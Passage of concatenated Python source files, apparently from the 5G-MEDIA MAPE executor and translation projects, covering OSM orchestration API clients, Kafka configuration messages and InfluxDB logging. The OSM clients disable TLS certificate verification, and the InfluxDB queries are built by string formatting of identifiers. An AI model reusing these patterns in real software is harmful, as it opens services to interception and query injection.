"ns-vld-id": "cache"
},
"management": {
"mgmt-vnf": "true",
"mac-address": "fa:16:3e:99:33:43",
"ip-address": "192.168.111.29",
"name": "ens3",
"ns-vld-id": "management"
}
},
"mid": {
"management": {
"ip-address": "192.168.111.13",
"ns-vld-id": "management",
"name": "ens3",
"mac-address": "fa:16:3e:02:f5:1c",
"mgmt-vnf": true
},
"cache": {
"ip-address": "192.168.253.12",
"name": "ens6",
"ns-vld-id": "cache",
"mac-address": "fa:16:3e:60:5d:9d"
},
"origin": {
"ip-address": "192.168.254.5",
"name": "ens7",
"ns-vld-id": "origin",
"mac-address": "fa:16:3e:0d:64:97"
}
}
},
<int|1>
)
"""
vdus_list = []
interfaces = {"mid": None, "edge": None}
edges_interfaces_all = {}
count_index = None
# Fetch the VNFs by given NS instance
token = bearer_token(OSM_ADMIN_CREDENTIALS.get('username'),
OSM_ADMIN_CREDENTIALS.get('password'))
vnf = Vnf(token)
response = vnf.get_list_by_ns(ns_uuid=ns_uuid)
vnfs_list = response.json()
# Keep the VDUs details
for vnf_instance in vnfs_list:
vdus_list += vnf_instance.get("vdur", [])
# Discover the interfaces of the proper scaled Edge VNF and Mid vCache
for vdu in vdus_list:
# Get Mid vCache net details
if vdu.get('vdu-id-ref', None) is not None and \
vdu['vdu-id-ref'] == search_for_mid_cache and \
vdu.get('count-index', None) == 0:
interfaces['mid'] = format_vdu_interfaces(vdu.get('interfaces', []))
# Get Edge vCache net details (the new one)
if vdu.get('vdu-id-ref', None) is not None and \
vdu['vdu-id-ref'] == search_for_edge_cache and \
vdu.get('count-index', None) >= 0:
edges_interfaces_all[str(vdu['count-index'])] = format_vdu_interfaces(
vdu.get('interfaces', []))
# Keep the VDU with the greatest count-index
latest_vdu_index = max([int(k) for k in list(edges_interfaces_all.keys())])
count_index = latest_vdu_index
interfaces['edge'] = edges_interfaces_all[str(latest_vdu_index)]
return interfaces, count_index
def get_faas_vcdn_net_interfaces(ns_uuid, search_for_mid_cache="vCache_mid_vdu",
search_for_edge_cache="vCache_edge_vdu"):
""" Get the network interfaces of the VNF
Args:
ns_uuid (str): The NS uuid, in which the scaled VNF belongs to
search_for_mid_cache (str): Search for the Mid vCache by given explicit name
search_for_edge_cache (str): Search for scaled Edge vCache by given explicit name
Returns:
dict: The details of the VNF interfaces
(
{
"edge": None,
"mid": {
"management": {
"ip-address": "192.168.111.13",
"ns-vld-id": "management",
"name": "ens3",
"mac-address": "fa:16:3e:02:f5:1c",
"mgmt-vnf": true
},
"cache": {
"ip-address": "192.168.253.12",
"name": "ens6",
"ns-vld-id": "cache",
"mac-address": "fa:16:3e:60:5d:9d"
},
"origin": {
"ip-address": "192.168.254.5",
"name": "ens7",
"ns-vld-id": "origin",
"mac-address": "fa:16:3e:0d:64:97"
}
}
}
)
"""
vdus_list = []
interfaces = {"mid": None, "edge": None}
edges_interfaces_all = {}
count_index = None
# Fetch the VNFs by given NS instance
token = bearer_token(OSM_ADMIN_CREDENTIALS.get('username'),
OSM_ADMIN_CREDENTIALS.get('password'))
vnf = Vnf(token)
response = vnf.get_list_by_ns(ns_uuid=ns_uuid)
vnfs_list = response.json()
# Keep the VDUs details
for vnf_instance in vnfs_list:
vdus_list += vnf_instance.get("vdur", [])
# Discover the interfaces of the proper scaled Edge VNF and Mid vCache
for vdu in vdus_list:
# Get Mid vCache net details
if vdu.get('vdu-id-ref', None) is not None and \
vdu['vdu-id-ref'] == search_for_mid_cache and \
vdu.get('count-index', None) == 0:
interfaces['mid'] = format_vdu_interfaces(vdu.get('interfaces', []))
# Get Edge vCache net details (the new one)
if vdu.get('vdu-id-ref', None) is not None and \
vdu['vdu-id-ref'] == search_for_edge_cache and \
vdu.get('count-index', None) > 0:
edges_interfaces_all[str(vdu['count-index'])] = format_vdu_interfaces(
vdu.get('interfaces', []))
return interfaces
def format_vdu_interfaces(interfaces_list):
""" Convert the list of VDU interfaces in a dict using the name of the interfaces as keys
Args:
interfaces_list (list): The list of VDU net interfaces. Each item is a dict.
Returns:
dict: The interfaces as dict
{
"user": {
"mac-address": "fa:16:3e:0c:94:7f",
"ip-address": "192.168.252.12",
"name": "ens6",
"ns-vld-id": "user"
},
"cache": {
"mac-address": "fa:16:3e:4d:b9:64",
"ip-address": "192.168.253.9",
"name": "ens7",
"ns-vld-id": "cache"
},
"management": {
"mgmt-vnf": "true",
"mac-address": "fa:16:3e:99:33:43",
"ip-address": "192.168.111.29",
"name": "ens3",
"ns-vld-id": "management"
}
}
"""
interfaces = {}
for interface in interfaces_list:
net_type = interface.get('ns-vld-id', None)
if net_type is None:
continue
interfaces[net_type] = interface
return interfaces
```
#### File: actions/vnf_configuration/vce.py
```python
from settings import KAFKA_CONFIGURATION_TOPIC
from utils import init_producer
class Configuration:
action_key = "vce"
def __init__(self, mac):
""" Configuration constructor
Args:
mac (str): The mac of the VDU
"""
self.mac = mac
self.action = {
'id': self.mac
}
def set_bitrate(self, bitrate):
""" Compose the configuration message to be sent on Kafka bus
Args:
bitrate (int): The profile to be applied in vCE
Returns:
bool: If the message published in kafka or not
Examples:
>>> from actions.vnf_configuration.vce import Configuration
>>> vdu_uuid = "12:12:32:12:a1"
>>> configuration = Configuration(vdu_uuid)
>>> bitrate = 2213
>>> configuration.set_bitrate(bitrate)
"""
completed = True
message = {
"mac": self.mac,
"action": {'bitrate': bitrate}
}
kafka_producer = init_producer()
operation = kafka_producer.send(KAFKA_CONFIGURATION_TOPIC, value=message,
key=self.action_key)
try:
operation.get(timeout=5)
except Exception as ex:
completed = False
finally:
kafka_producer.close()
return completed
```
#### File: actions/vnf_configuration/vtranscoder.py
```python
from settings import KAFKA_CONFIGURATION_TOPIC
from utils import init_producer
class Configuration:
action_key = "faas"
def __init__(self, ns_name, vnfd_name, vnf_index):
""" Configuration constructor
Args:
ns_name (str): The name of the NS (not the uuid)
vnfd_name (str): The name of the VNF descriptor
vnf_index (int): The index of the VNF
"""
self.ns_name = ns_name
self.vnfd_name = vnfd_name
self.vnf_index = vnf_index
self.action = {
'ns_name': self.ns_name,
'vnf_name': self.vnfd_name,
'vnf_index': '{}'.format(self.vnf_index)
}
def set_transcoder_profile(self, t_qualities):
""" Compose the configuration message to be sent on Kafka bus
The FaaS configuration service is used, as implemented from @IBM.
Args:
t_qualities (tuple): The qualities to be circulated in vTranscoder
Returns:
bool: If the message published in kafka or not
Indicative message:
{
"ns_name": "ns_name|string",
"vnf_name": "vnfd_name|name",
"vnf_index": "integer",
"action_params": {
"produce_profiles": [
0,
2,
4
]
}
}
Examples:
>>> from actions.vnf_configuration.vtranscoder import Configuration
>>> ns_name = "ns_name_xxxx"
>>> vnfd_name = "vnfd_name_xxx"
>>> vnf_index = 1
>>> configuration = Configuration(ns_name, vnfd_name, vnf_index)
>>> profiles = (0,2,4)
>>> configuration.set_transcoder_profile(profiles)
True
"""
completed = True
qualities = list(t_qualities)
# Append the profiles, proposed by the CNO
if not isinstance(qualities, list):
raise ValueError('Invalid input for vtranscoder qualities: {}'.format(qualities))
if not len(qualities):
raise ValueError('Empty list of vtranscoder qualities: {}'.format(qualities))
action_parameters = {
"produce_profiles": list(qualities)
}
self.action["action_params"] = action_parameters
kafka_producer = init_producer()
operation = kafka_producer.send(KAFKA_CONFIGURATION_TOPIC, value=self.action,
key=self.action_key)
try:
operation.get(timeout=5)
except Exception:
completed = False
finally:
kafka_producer.close()
return completed
def apply_placement(self, processor="cpu"):
""" Force vtranscoder placement: CPU vs GPU and vice versa.
The FaaS configuration service is used, as implemented from @IBM.
Args:
processor (str): cpu or gpu
Returns:
bool: bool: If the message published in kafka or not
Indicative sample:
{
"ns_name": "sky_balls",
"vnf_name": "transcoder_2_8_4_vnfd",
"vnf_index": "1",
"invoker-selector": "cpu",
"action-antiaffinity": "true",
"action_params": {
"gpu_node": "0"
}
}
Examples:
>>> from actions.vnf_configuration.vtranscoder import Configuration
>>> ns_name = "ns_name_xxxx"
>>> vnfd_name = "vnfd_name_xxx"
>>> vnf_index = 1
>>> configuration = Configuration(ns_name, vnfd_name, vnf_index)
>>> configuration.apply_placement(processor="cpu")
True
"""
completed = True
gpu_node = "0" if processor == "cpu" else "1"
action_antiaffinity = "true"
self.action["invoker-selector"] = processor
self.action["action-antiaffinity"] = action_antiaffinity
action_parameters = dict()
action_parameters["gpu_node"] = gpu_node
self.action["action_params"] = action_parameters
kafka_producer = init_producer()
operation = kafka_producer.send(KAFKA_CONFIGURATION_TOPIC, value=self.action,
key=self.action_key)
try:
operation.get(timeout=5)
except Exception:
completed = False
finally:
kafka_producer.close()
return completed
def set_spectator_quality(self, cpu=True):
"""
The configuration is consumed from the spectators through the kafka bus - not using
the FaaS Conf service.
Args:
cpu:
Returns:
"""
completed = True
processor = "cpu" if cpu else "gpu"
configuration_message = {
"annotations": [{
"key": "placement",
"value": {
"invoker-selector": {
"processor": processor
}
},
"action-antiaffinity": "true"
}]
}
self.action["action_params"] = configuration_message
kafka_producer = init_producer()
operation = kafka_producer.send(KAFKA_CONFIGURATION_TOPIC, value=self.action,
key=self.action_key)
try:
operation.get(timeout=5)
except Exception:
completed = False
finally:
kafka_producer.close()
return completed
```
#### File: emulator/consumer/configuration.py
```python
import json
from emulator.utils import init_consumer
from settings import KAFKA_CONFIGURATION_TOPIC
def main():
kafka_consumer = init_consumer("TEST_CONF_SUBSCRIBER1")
kafka_consumer.subscribe(pattern=KAFKA_CONFIGURATION_TOPIC)
for msg in kafka_consumer:
topic = msg.topic
try:
key = msg.key.decode('utf-8')
value = json.loads(msg.value.decode('utf-8'))
print("[Topic {}] key: {} has value {}".format(topic, key, value))
except AttributeError as e:
print("{}".format(e))
except json.decoder.JSONDecodeError:
print("Invalid message")
except Exception as e:
print("{}".format(e))
pass
if __name__ == '__main__':
main()
```
#### File: mape-executor/faasapi/ns_polling.py
```python
import logging.config
from httpclient.client import Client
from settings import LOGGING
logging.config.dictConfig(LOGGING)
logger = logging.getLogger("worker")
class NetworkServicePolling:
def __init__(self, osm_host, osm_faas_host, osm_faas_port, ns_name):
""" Initialize the object
Args:
osm_host (str): The OSM host
osm_faas_host (str): The FaaS VIM host (normally it is the same with OSM host)
osm_faas_port (str): The FaaS VIM port
ns_name (str): The NS name
"""
self.__client = Client()
self.osm_host = osm_host
self.faas_polling_host = osm_faas_host
self.faas_polling_ip = osm_faas_port
self.bootstrap_ingress_url = None
self.ns_name = ns_name
def get_vnfs_info(self):
""" Get information about the involved VNFs
Returns:
dict:
Response Example:
[
{
"vnf_name": "vcdn_bootstrap_vnfd.1",
"status": "ACTIVE",
"records": 0,
"ip_address": "0.0.0.0"
},
{
"vnf_name": "vcache_vnfd.2",
"status": "ACTIVE",
"records": 2,
"ip_address": "0.0.0.0"
},
{
"vnf_name": "vCache_mid_UC3_5GMEDIA.3",
"status": "ACTIVE",
"records": 0,
"ip_address": "192.168.111.19"
},
{
"vnf_name": "vCache_edge_UC3_5GMEDIA.4",
"status": "ACTIVE",
"records": 0,
"ip_address": "192.168.111.27"
}
]
"""
vnfs_list = []
endpoint = 'http://{}:{}/osm/{}'.format(self.faas_polling_host, self.faas_polling_ip,
self.ns_name)
request = self.__client.get(endpoint)
response_status = request.status_code
data = request.json()
for vnf in data['vnfs']:
vnf_name = vnf.get('vnf_name', None)
ip_address = vnf.get('ip_address', None)
status = vnf.get('status', None)
vim_info = vnf.get('vim_info', {})
records = 0
if 'records' in vim_info.keys():
records = len(vim_info['records'])
vnf_entry = {'vnf_name': vnf_name, 'ip_address': ip_address, 'status': status,
'records': records}
vnfs_list.append(vnf_entry)
return vnfs_list
def get_bootstrap_ingress_url(self):
""" Get the Ingress Url of the bootstrap serverless VNF
Returns:
str: the Ingress Url of the bootstrap serverless VNF
"""
bootstrap_ingress_url = None
endpoint = 'http://{}:{}/osm/{}'.format(self.faas_polling_host, self.faas_polling_ip,
self.ns_name)
request = self.__client.get(endpoint)
response_status = request.status_code
data = request.json()
if response_status != 200:
return bootstrap_ingress_url
for vnf in data['vnfs']:
ingress_url = vnf.get('vim_info', {}).get('IngressUrl', None)
if ingress_url is not None:
bootstrap_ingress_url = ingress_url
break
return bootstrap_ingress_url
def set_bootstrap_ingress_url(self, bootstrap_ingress_url):
"""
Set the Ingress Url of the bootstrap serverless VNF
"""
self.bootstrap_ingress_url = bootstrap_ingress_url
```
#### File: mape-executor/influx/queries.py
```python
import logging.config
from utils import init_influx_client, get_utcnow_timestamp, get_one_hour_ago
from settings import LOGGING
logging.config.dictConfig(LOGGING)
logger = logging.getLogger("worker")
def store_operation(operation_type, event_uuid, ns_name, ns_uuid, instance_number):
""" Store a faas operation like vcache spawn
Args:
operation_type (str): The type of the operation.
event_uuid (str): the identifier of the event
ns_name (str): the NS name
ns_uuid (str): the NS identifier
instance_number (int): The number of VNF instance
Returns:
None
"""
influx_client = init_influx_client()
timestamp = get_utcnow_timestamp()
operation = [
{
"measurement": "faas_operations",
"time": timestamp,
"tags": {
"operation_type": operation_type,
"event_uuid": event_uuid,
"ns_uuid": ns_uuid
},
"fields": {
"ns_name": ns_name,
"instance_number": int(instance_number)
}
}
]
influx_client.write_points(operation)
def get_first_operation(ns_uuid):
""" Fetch information for the less recent spawned event (the last hour)
ns_uuid (str): The NS identifier
Returns:
dict: the event identifier and the FaaS VNF instance number
"""
event_uuid, instance_number = None, None
one_hour_ago = get_one_hour_ago()
try:
client = init_influx_client()
query = "select * from faas_operations where time> '{}' and ns_uuid='{}' order by time asc limit 1".format(
one_hour_ago, ns_uuid)
response = client.query(query)
series = response.raw['series']
serie = series[0]
values = serie['values']
value = values[0]
event_uuid = value[1]
instance_number = value[2]
except Exception as ex:
logger.error(ex)
finally:
return {"event_uuid": event_uuid, "instance_number": instance_number}
def get_last_operation(ns_uuid):
""" Fetch information for the most recent spawned event
ns_uuid (str): The NS identifier
Returns:
dict: the event identifier and the FaaS VNF instance number
"""
event_uuid, instance_number = None, 0
try:
client = init_influx_client()
query = "select * from faas_operations where ns_uuid='{}' order by time desc limit 1".format(
ns_uuid)
response = client.query(query)
series = response.raw['series']
serie = series[0]
values = serie['values']
value = values[0]
event_uuid = value[1]
instance_number = value[2]
except Exception as ex:
logger.error(ex)
finally:
return {"event_uuid": event_uuid, "instance_number": instance_number}
def delete_operation(event_uuid):
""" Drop a series from the faas_operations measurement by given the event uuid
Args:
event_uuid (str): The event uuid
Returns:
bool: True for success. Otherwise, False.
"""
client = init_influx_client()
query = "DROP SERIES FROM faas_operations WHERE event_uuid='{}'".format(event_uuid)
response = client.query(query)
return response.error is None
def delete_operation_by_ns(ns_uuid):
""" Drop a series from the faas_operations measurement by given the NS uuid
Args:
ns_uuid (str): The NS uuid
Returns:
bool: True for success. Otherwise, False.
"""
client = init_influx_client()
query = "DROP SERIES FROM faas_operations WHERE ns_uuid='{}'".format(ns_uuid)
response = client.query(query)
return response.error is None
```
#### File: mape-executor/nbiapi/ns.py
```python
from settings import OSM_COMPONENTS, LOGGING
from httpclient.client import Client
import logging.config
import urllib3
import json
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
logging.config.dictConfig(LOGGING)
logger = logging.getLogger("osm")
class Ns(object):
"""NS Class.
Attributes:
bearer_token (str): The OSM Authorization Token
Args:
token (str): The OSM Authorization Token
"""
def __init__(self, token):
"""NS LCM Class Constructor."""
self.__client = Client(verify_ssl_cert=False)
self.bearer_token = token
def get_list(self):
"""Fetch a list of all NS Instances
Returns:
object: A list of NSs as a requests object
Examples:
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.ns import Ns
>>> from settings import OSM_ADMIN_CREDENTIALS
>>> token = bearer_token(OSM_ADMIN_CREDENTIALS.get('username'), OSM_ADMIN_CREDENTIALS.get('username'))
>>> ns = Ns(token)
>>> response = ns.get_list()
>>> print(response.json())
OSM Cli:
$ osm ns-list
"""
endpoint = '{}/osm/nslcm/v1/ns_instances'.format(OSM_COMPONENTS.get('NBI-API'))
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.get(endpoint, headers)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
def get(self, ns_uuid=None):
"""Fetch details of a specific NS Instance
Args:
ns_uuid (str): The UUID of the NS to fetch details for
Returns:
object: A requests object
Examples:
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.ns import Ns
>>> from settings import OSM_ADMIN_CREDENTIALS
>>> token = bearer_token(OSM_ADMIN_CREDENTIALS.get('username'), OSM_ADMIN_CREDENTIALS.get('username'))
>>> ns = Ns(token)
>>> response = ns.get(ns_uuid='07048175-660b-404f-bbc9-5be7581e74de')
OSM Cli:
$ osm ns-show 07048175-660b-404f-bbc9-5be7581e74de
"""
endpoint = '{}/osm/nslcm/v1/ns_instances/{}'.format(OSM_COMPONENTS.get('NBI-API'), ns_uuid)
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.get(endpoint, headers)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
def scale_vnf(self, ns_uuid, vnf_index, scaling_group_name, scale_out=True):
""" Scale in or out in VNF level
Args:
ns_uuid (str): The NS uuid
vnf_index (int): The VNF index to be scaled
scaling_group_name (str): The name in the VNF scaling_group_descriptor
scale_out (bool): Decide scale in or out action. By default, scale out is performed.
Returns:
object: A requests object
Examples:
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.ns import Ns
>>> from settings import OSM_ADMIN_CREDENTIALS
>>> token = bearer_token(OSM_ADMIN_CREDENTIALS.get('username'), OSM_ADMIN_CREDENTIALS.get('username'))
>>> ns = Ns(token)
>>> response = ns.scale_vnf(ns_uuid="199b1fcd-eb32-4c6f-b149-34410acc2a32", vnf_index=2, scaling_group_name="scale_by_one", scale_out=False)
# >>> response = ns.scale_vnf(ns_uuid="199b1fcd-eb32-4c6f-b149-34410acc2a32", vnf_index=2, scaling_group_name="scale_by_one", scale_out=False)
OSM Cli:
$ osm vnf-scale <ns_uuid> <vnf_index> --scale-in # scale in
Scaling group: <scaling_group_name>
$ osm vnf-scale <ns_uuid> <vnf_index> --scale-out # scale out (default)
Scaling group: <scaling_group_name>
"""
endpoint = '{}/osm/nslcm/v1/ns_instances/{}/scale'.format(OSM_COMPONENTS.get('NBI-API'), ns_uuid)
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
# Set value based on scale action
scale_action = "SCALE_IN"
if scale_out:
scale_action = "SCALE_OUT"
payload = {
"scaleVnfData": {
"scaleVnfType": scale_action,
"scaleByStepData": {
"member-vnf-index": str(vnf_index),
"scaling-group-descriptor": str(scaling_group_name)
}
},
"scaleType": "SCALE_VNF"
}
response = self.__client.post(endpoint, headers, payload=json.dumps(payload))
logger.debug("Request `POST {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
def terminate(self, ns_uuid=None):
"""Terminate a NS Instance.
Args:
ns_uuid (str): The UUID of the NS to terminate
Returns:
response (object): A requests object
Examples:
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.ns import Ns
>>> from settings import OSM_ADMIN_CREDENTIALS
>>> token = bearer_token(OSM_ADMIN_CREDENTIALS.get('username'), OSM_ADMIN_CREDENTIALS.get('username'))
>>> ns = Ns(token)
>>> response = ns.terminate(ns_uuid='07048175-660b-404f-bbc9-5be7581e74de')
"""
endpoint = '{}/osm/nslcm/v1/ns_instances/{}/terminate'.format(OSM_COMPONENTS.get('NBI-API'), ns_uuid)
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.post(endpoint, headers)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
```
#### File: mape-executor/nbiapi/user.py
```python
from settings import OSM_COMPONENTS, LOGGING
from httpclient.client import Client
import logging.config
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
logging.config.dictConfig(LOGGING)
logger = logging.getLogger("osm")
class User(object):
"""Description of User class"""
def __init__(self, token):
"""Constructor of User class"""
self.__client = Client(verify_ssl_cert=False)
self.bearer_token = token
def get_list(self):
"""Get the list of the registered users in OSM r4
Returns:
obj: a requests object
Examples:
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.user import User
>>> from settings import OSM_ADMIN_CREDENTIALS
>>> token = bearer_token(OSM_ADMIN_CREDENTIALS.get('username'), OSM_ADMIN_CREDENTIALS.get('username'))
>>> user = User(token)
>>> response = user.get_list()
>>> print(response.json())
"""
endpoint = '{}/osm/admin/v1/users'.format(OSM_COMPONENTS.get('NBI-API'))
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.get(endpoint, headers)
return response
def get(self, username=None):
"""Get details of a user in OSM r4 by given username
Returns:
obj: a requests object
Examples:
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.user import User
>>> from settings import OSM_ADMIN_CREDENTIALS
>>> token = bearer_token(OSM_ADMIN_CREDENTIALS.get('username'), OSM_ADMIN_CREDENTIALS.get('username'))
>>> user = User(token)
>>> response = user.get(username="admin")
>>> print(response.json())
"""
endpoint = '{}/osm/admin/v1/users/{}'.format(OSM_COMPONENTS.get('NBI-API'), username)
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.get(endpoint, headers)
return response
``` |
{
"source": "5g-media/mape-translation",
"score": 2
} |
#### File: mape-translation/translator/opennebula.py
```python
from translator.basemetric import BaseMetric
from translator.exceptions import OsmInfoNotFound
from translator.utils import get_vdu_details, opennebula_metrics
import copy
class Metric(BaseMetric):
def __init__(self, raw_metric, source="opennebula"):
self.source = source
self.raw_metric = raw_metric
self.supported_metrics = opennebula_metrics()
super().__init__()
def get_metric(self):
"""Format the metric data.
Note: In case of OpenNebula, the structure is already the proper.
Thus, no transformation is needed.
Returns:
dict: the metric including the name, type, unit, timestamp and value
"""
new_metric = copy.deepcopy(self.raw_metric)
if 'vdu_uuid' in new_metric.keys():
del new_metric['vdu_uuid']
new_metric['name'] = new_metric['type']
new_metric['type'] = self.get_metric_type()
return new_metric
def get_metric_type(self):
"""Get the type of the metric
Returns:
str: the type of the metric
"""
search_for_metric = self.raw_metric['type']
if search_for_metric in self.supported_metrics.keys():
return self.supported_metrics[search_for_metric].get('type', "gauge")
return "unknown"
def get_translation(self, vdu_uuid=None):
"""Generate and return a common data model for each type of metric.
Args:
vdu_uuid (str): The vdu uuid. Actually, it maps to the container ID
Returns:
dict: A common data model for each type of metric.
"""
return get_vdu_details(vdu_uuid, self.raw_metric, source=self.source)
```
#### File: mape-translation/translator/openstack.py
```python
from translator.basemetric import BaseMetric
from translator.utils import get_vdu_details
from translator.exceptions import OsmInfoNotFound
class Metric(BaseMetric):
"""Constructor"""
def __init__(self, raw_metric, source="openstack"):
self.source = source
self.raw_metric = raw_metric
super().__init__()
def get_metric(self):
"""Format the metric data
Returns:
dict: the metric including the name, type, unit, timestamp and value
"""
timestamp = self.raw_metric.get("timestamp", None)
if timestamp is not None and not timestamp.endswith('Z'):
timestamp = "{}Z".format(timestamp)
metric = {
"name": self.raw_metric.get("counter_name", None),
"type": self.raw_metric.get("counter_name", None),
"value": self.raw_metric.get("counter_volume", None),
"unit": self.raw_metric.get("counter_unit", None),
"timestamp": timestamp
}
return metric
def get_translation(self, vdu_uuid):
"""Generate and return a common data model for each type of metric.
Args:
vdu_uuid (str): The vdu uuid
Returns:
dict: A common data model for each type of metric. See more in the `samples/output.json` file.
"""
return get_vdu_details(vdu_uuid, self.raw_metric, source=self.source)
```
#### File: mape-translation/translator/unikernels.py
```python
from translator.basemetric import BaseMetric
class Metric(BaseMetric):
def __init__(self, raw_metric):
self.raw_metric = raw_metric
super().__init__()
def get_data_model(self):
pass
```
#### File: 5g-media/mape-translation/vtranscoder3d_spectators.py
```python
import json
import logging.config
import redis
from kafka import KafkaConsumer, KafkaProducer
from kafka.errors import KafkaError
from settings import KAFKA_SERVER, KAFKA_CLIENT_ID, KAFKA_API_VERSION, KAFKA_MONITORING_TOPICS, \
LOGGING, KAFKA_GROUP_ID, KAFKA_TRANSLATION_TOPIC, REDIS_HOST, REDIS_PORT, REDIS_NFVI_DB, \
KAFKA_TIMEOUT, REDIS_EXPIRATION_SECONDS
from translator.utils import compose_redis_key, convert_bytes_to_str, \
discover_vdu_uuid_by_vnf_index, discover_vnf_uuid_by_vnfd_name_index
from translator.exceptions import VnfNotFound, OsmInfoNotFound, InvalidTranscoderId, \
VduUuidMissRedis
from translator.apps import vtranscoder3d_spectators
NFVI_OR_APP = "vtranscoder3d_spectators"
logging.config.dictConfig(LOGGING)
logger = logging.getLogger(NFVI_OR_APP)
def init_consumer(scope=None):
""" Init the Kafka consumer
# See more: https://kafka-python.readthedocs.io/en/master/apidoc/KafkaConsumer.html
Args:
scope (str): The origin of the metrics
Returns:
Iterator: The kafka consumer
"""
consumer = KafkaConsumer(bootstrap_servers=KAFKA_SERVER,
client_id=KAFKA_CLIENT_ID,
enable_auto_commit=True,
api_version=KAFKA_API_VERSION,
group_id=KAFKA_GROUP_ID[scope])
return consumer
def init_redis_connection():
""" Init the connection with Redis
# See more: https://redis-py.readthedocs.io/en/latest/
Returns:
object
"""
redis_conn = redis.Redis(host=REDIS_HOST,
port=REDIS_PORT,
db=REDIS_NFVI_DB)
return redis_conn
def main():
"""Main process"""
kafka_consumer = init_consumer(scope=NFVI_OR_APP)
kafka_consumer.subscribe(pattern=KAFKA_MONITORING_TOPICS[NFVI_OR_APP])
redis_conn = init_redis_connection()
# Consume the metrics coming from the vTranscoder3D spectators in the UC1.
# See Also: samples/uc1-vTranscoder3D/input/spectators_review.json
for msg in kafka_consumer:
topic = msg.topic
try:
payload = json.loads(msg.value.decode('utf-8', 'ignore'))
client_id = payload['client_id']
group_id = payload.get('group_id', "unknown")
timestamp = int(str(payload['timestamp']).split('.')[0])
incoming_streams = payload.get('incoming_streams', [])
spectator = {"client_id": client_id, "group_id": group_id}
for stream in incoming_streams:
try:
# Discover the VNF uuid by given the vnfd name & index and store it in redis
vnf_uuid = get_vnf_uuid(redis_conn, stream, topic)
# Get quality ID and original metrics
quality_id = stream.get("quality_id", None)
original_metrics = stream.get("metrics", [])
translator = vtranscoder3d_spectators.Metric(
client_id, group_id, timestamp, quality_id, original_metrics,
source=NFVI_OR_APP)
# Retrieve information related to the MANO including VIM, NS, VNF, VDU.
# A request will be performed in the Redis using the concatenation of
# topic, vdu_uuid as key. In case that no entry exists in the Redis, a
# request will be done in the OSM NBI API. After the successful retrieval,
# the MANO data are stored in the Redis for future usage.
mano_data = generate_payload(translator, redis_conn, topic, vnf_uuid)
stream_metrics = translator.get_metrics()
# Publish the value(s) in the Kafka bus, in translation-specific-topic
publish_messages(stream_metrics, mano_data, spectator)
except VduUuidMissRedis as ex:
logger.info(ex)
except (VnfNotFound, InvalidTranscoderId, OsmInfoNotFound) as exc:
logger.warning(exc)
except (VnfNotFound, OsmInfoNotFound) as ex:
logger.warning(ex)
except json.decoder.JSONDecodeError as je:
logger.error("JSONDecodeError: {}".format(je))
except Exception as ex:
logger.exception(ex)
def get_vnf_uuid(redis_connection, stream, topic):
""" Get the VNF uuid, if any
Args:
redis_connection (object): The redis connection object
stream (dict): The stream
topic (str): The Kafka topic
Returns:
str: the VNF uuid
Raises:
InvalidTranscoderId: if the transcoder ID is not valid
VnfNotFound: if VNF uuid does not exist
"""
transcoder_id = stream.get("transcoder_id", None)
if transcoder_id is None:
raise InvalidTranscoderId(
'Invalid transcoder_id value. Its value is {}'.format(transcoder_id))
try:
if int(transcoder_id) == 0:
raise InvalidTranscoderId('Invalid transcoder_id value. Its value is {}'.format(
transcoder_id))
except ValueError:
pass
search_for_transcoder_id = "{}:{}".format(topic, transcoder_id)
cached_vnf_uuid_bytes = redis_connection.get(name=search_for_transcoder_id)
if cached_vnf_uuid_bytes is not None:
vnf_uuid = convert_bytes_to_str(cached_vnf_uuid_bytes)
else:
vnf_uuid = discover_vnf_uuid_by_vnfd_name_index(transcoder_id)
if vnf_uuid is not None:
redis_connection.set(name=search_for_transcoder_id,
value="{}".format(vnf_uuid), ex=300) # 5 minutes
logger.debug("VNF is {} for id {}".format(vnf_uuid, transcoder_id))
quality_id = stream.get("quality_id", None)
if vnf_uuid is None or quality_id is None:
raise VnfNotFound('The VNF uuid does not exist in the consumed message')
vnf_uuid = vnf_uuid.replace(" ", "_")
return vnf_uuid
def generate_payload(translator, redis_connection, topic, vnf_uuid):
""" Get the OSM related data
Args:
translator (object): The translator object
redis_connection (object): The redis connection object
topic (str): The kafka topic
vnf_uuid (str): The VNF uuid
Returns:
dict: The mano-related data
Raises:
OsmInfoNotFound
"""
redis_key = compose_redis_key(topic, vnf_uuid, identifier_type='vnf')
cached_value_bytes = redis_connection.get(name=redis_key)
if cached_value_bytes is not None:
# Load the relevant OSM-info entry from the redis
record = json.loads(convert_bytes_to_str(cached_value_bytes))
if record.get('status', 404) == 404:
raise VduUuidMissRedis(
"OSM data not found in Redis for the VNF uuid: `{}`".format(vnf_uuid))
mano_data = record.get('mano')
logger.debug("Load OSM entry for vTranscoder3D VNF uuid: `{}` from Redis".format(
vnf_uuid))
else:
# Generate a standard structure for each metric
mano_data = translator.get_translation(vnf_uuid)
mano_data_len = len(mano_data)
# Keep status in redis to highlight if a VNF record exists in OSM or not.
# If VNF does not exist use status 404 and ignore it in the next redis read.
if not mano_data_len:
redis_record = {"status": 404} # 404 means means that VNF uuid does not exist in OSM
else:
redis_record = {"status": 200, "mano": mano_data} # 200 means VNF uuid exists in OSM
logger.debug(
